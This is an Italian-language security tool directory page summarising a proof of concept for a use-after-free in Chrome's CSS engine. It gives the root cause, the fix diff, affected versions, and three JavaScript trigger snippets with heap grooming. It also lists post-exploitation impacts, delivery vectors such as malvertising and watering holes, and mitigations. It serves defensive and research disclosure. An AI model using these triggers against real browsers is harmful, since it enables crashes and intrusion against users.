Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2441-PoC — Proof-of-concept per CVE-2026-2441, un use-after-free nel motore CSS di Chrome, che dimostra il crash del renderer e la potenziale esecuzione di codice in sandbox tramite HTML appositamente predisposto. | Kitploit
Strumenti/GitHubGitHub/huseyinstif/cve-2026-2441-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebAnalisi MalwareApprendimento e Formazione
GitHubhuseyinstif/cve-2026-2441-poc

CVE-2026-2441-PoC

Proof-of-concept per CVE-2026-2441, un use-after-free nel motore CSS di Chrome, che dimostra il crash del renderer e la potenziale esecuzione di codice in sandbox tramite HTML appositamente predisposto.

Vedi Repository
135246 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-2441 — Use-After-Free in Chrome CSSFontFeatureValuesMap

CVSS 8.8 (Alto) | Sfruttata attivamente in natura | RCE nel Renderer (Sandboxed)

Una vulnerabilità use-after-free nel motore CSS Blink di Google Chrome che consente a un attaccante remoto di eseguire codice arbitrario all'interno della sandbox del browser tramite una pagina HTML appositamente predisposta.

Dettagli della Vulnerabilità

CampoValore
CVECVE-2026-2441
CVSS8.8 (Alto)
TipoUse-After-Free (CWE-416)
ComponenteBlink CSS — CSSFontFeatureValuesMap
File Sorgentethird_party/blink/renderer/core/css/css_font_feature_values_map.cc
Commit di Fix63f3cb4864c64c677cd60c76c8cb49d37d08319c
SegnalatoreShaheen Fazim (2026-02-11)
Data della Patch2026-02-13
In-the-WildSì — Google ha confermato lo sfruttamento attivo

Versioni Interessate

PiattaformaVulnerabileCorretta
Windows / macOS (Stabile)< 145.0.7632.75>= 145.0.7632.75
Linux (Stabile)< 144.0.7559.75>= 144.0.7559.75
Windows / macOS (Stabile Estesa)< 144.0.7559.177>= 144.0.7559.177
Browser basati su Chromium (Edge, Brave, Opera, Vivaldi)Consultare l'avviso del vendorVariabile

Causa Radice

FontFeatureValuesMapIterationSource memorizzava un puntatore grezzo (const FontFeatureAliases* aliases_) alla HashMap interna FontFeatureAliases. Quando la mappa viene modificata durante l'iterazione tramite set() o delete(), la HashMap viene ri-hashatta — allocando nuova memoria e liberando la vecchia. Il puntatore grezzo diventa pendente (dangling), e la successiva chiamata a FetchNextItem() legge da memoria liberata.

Percorso di Codice Vulnerabile

root@kitploit:~
CreateIterationSource()
  → FontFeatureValuesMapIterationSource(map, aliases_)
  → aliases_ = puntatore grezzo alla HashMap interna
  → iterator_ = aliases_->begin()

FetchNextItem()
  → legge iterator_->key  (attraverso aliases_)

Se map.set() / map.delete() viene chiamato tra le iterazioni:
  → la HashMap viene ri-hashatta (nuova allocazione, vecchia liberata)
  → aliases_ → puntatore pendente
  → iterator_ → invalidato
  → Successiva FetchNextItem() → USE-AFTER-FREE

Fix

root@kitploit:~
- const FontFeatureAliases* aliases_;   // puntatore grezzo → pendente dopo il rehash
+ const FontFeatureAliases aliases_;    // copia profonda → immune al rehash

Il fix sostituisce il puntatore grezzo con una copia profonda della HashMap. Anche se la mappa originale viene ri-hashatta, l'iteratore opera sulla propria copia, prevenendo il puntatore pendente.

Proof of Concept

Utilizzo

  1. Aprire poc.html in una versione vulnerabile di Chrome (< 145.0.7632.75)
  2. La pagina tenterà di innescare la UAF attraverso tre metodi diversi

Risultati Attesi

Versione di ChromeComportamento Atteso
< 145.0.7632.75 (non patchata)Crash del Renderer — STATUS_ACCESS_VIOLATION (Windows) o SIGSEGV (Linux/macOS). Chrome mostra l'errore "Impossibile aprire questa pagina".
>= 145.0.7632.75 (patchata)Nessun crash — il PoC viene eseguito fino al completamento, tutte le voci vengono lette normalmente.

Screenshot (Chrome non patchato — Crash)

Quando aperto in una versione vulnerabile di Chrome, il processo del renderer va in crash con STATUS_ACCESS_VIOLATION:

root@kitploit:~
Impossibile aprire questa pagina

Codice errore: STATUS_ACCESS_VIOLATION

Questo conferma che la UAF è stata innescata — il puntatore pendente accede a memoria liberata/non mappata, causando la terminazione del processo del renderer.

Come Funziona il PoC

Il PoC innesca la UAF attraverso tre metodi indipendenti:

Metodo 1: Iteratore entries() + Ciclo di Mutazione

root@kitploit:~
const iterator = map.entries();
while (step < 20) {
    iterator.next();          // lettura attraverso il puntatore (ora pendente)
    map.delete(key);          // innesca il rehash
    for (i = 0; i < 512; i++)
        map.set("spray_" + i, [i]);  // forza la riallocazione
}

Metodo 2: for...of + Mutazione Concorrente

root@kitploit:~
for (const [k, v] of map) {
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("alt_" + i, [i]);
}

Metodo 3: requestAnimationFrame + Ricalcolo del Layout

root@kitploit:~
function rafTrigger() {
    document.body.offsetWidth;   // forza il ricalcolo del layout
    const result = iterator.next();
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("raf_" + i, [i]);
    requestAnimationFrame(rafTrigger);
}

Ogni metodo include anche heap grooming — allocando 50 regole @font-feature-values della stessa dimensione per rendere il layout dell'heap prevedibile per un potenziale sfruttamento.

Impatto

Immediato (Limitato alla Sandbox)

  • Esecuzione di codice arbitrario all'interno della sandbox del processo renderer
  • Divulgazione di informazioni — perdita di puntatori V8 heap (bypass ASLR), lettura del contenuto della memoria del renderer
  • Furto di credenziali — lettura di document.cookie, localStorage, sessionStorage, valori di input dei moduli
  • Dirottamento di sessione — furto di token di sessione, esfiltrazione tramite fetch() / WebSocket / sendBeacon()
  • Manipolazione del DOM — iniezione di moduli di phishing, modifica del contenuto della pagina
  • Keylogging — cattura di tutte le sequenze di tasti tramite addEventListener('keydown')

In Catena (con Sandbox Escape)

Quando combinata con una vulnerabilità separata di sandbox escape:

root@kitploit:~
RCE nel Renderer (CVE-2026-2441)
    → Exploit Mojo IPC → RCE nel processo Browser
        → Exploit del kernel → Compromissione totale del sistema
            → Installazione di malware / ransomware / spyware
            → Accesso al file system, movimento laterale, persistenza

Catene di exploit reali che utilizzano UAF simili nei browser:

  • NSO Pegasus — WebKit UAF + sandbox escape + exploit del kernel
  • Intellexa Predator — Chrome UAF + exploit del kernel Android
  • APT-28 (Fancy Bear) — Chrome 0-day + catena LPE Windows

Vettore di Attacco

Questa vulnerabilità è sfruttabile tramite drive-by download — nessuna interazione con l'utente oltre alla visita di una pagina dannosa è richiesta:

  • Malvertising — annunci dannosi serviti attraverso reti pubblicitarie legittime
  • Watering hole — compromissione di un sito visitato frequentemente dal bersaglio
  • Spear phishing — invio di un link appositamente predisposto via email o messaggistica

Mitigazione

  1. Aggiornare Chrome a >= 145.0.7632.75 (Windows/macOS) o >= 144.0.7559.75 (Linux)
  2. Aggiornare i browser basati su Chromium (Edge, Brave, Opera, Vivaldi) quando le patch del vendor sono disponibili
  3. Verificare che Site Isolation sia attivo (chrome://flags/#site-isolation-trial-opt-out)
  4. Monitorare gli endpoint per versioni di Chrome inferiori alle build corrette

Cronologia

DataEvento
2026-02-11Vulnerabilità segnalata da Shaheen Fazim
2026-02-13Google rilascia Chrome 145.0.7632.75/76 (Windows/macOS), 144.0.7559.75 (Linux)
2026-02-13Google riconosce lo sfruttamento in-the-wild
2026-02-16Vivaldi e Opera pubblicano i fix

Riferimenti

  • Blog dei Rilasci di Google Chrome
  • NVD — CVE-2026-2441
  • The Hacker News — Chrome Zero-Day Sotto Attacco Attivo
  • Chromium Issue Tracker (riservato)

Supporto

Se trovi utile questa ricerca, considera di offrirmi un caffè:

Buy Me A Coffee

Disclaimer

Questo proof of concept è fornito esclusivamente per scopi educativi e di ricerca sulla sicurezza autorizzata. L'uso di questo PoC contro sistemi senza esplicita autorizzazione è illegale e non etico. L'autore non è responsabile per qualsiasi uso improprio.

Licenza

MIT

Scarica lo strumento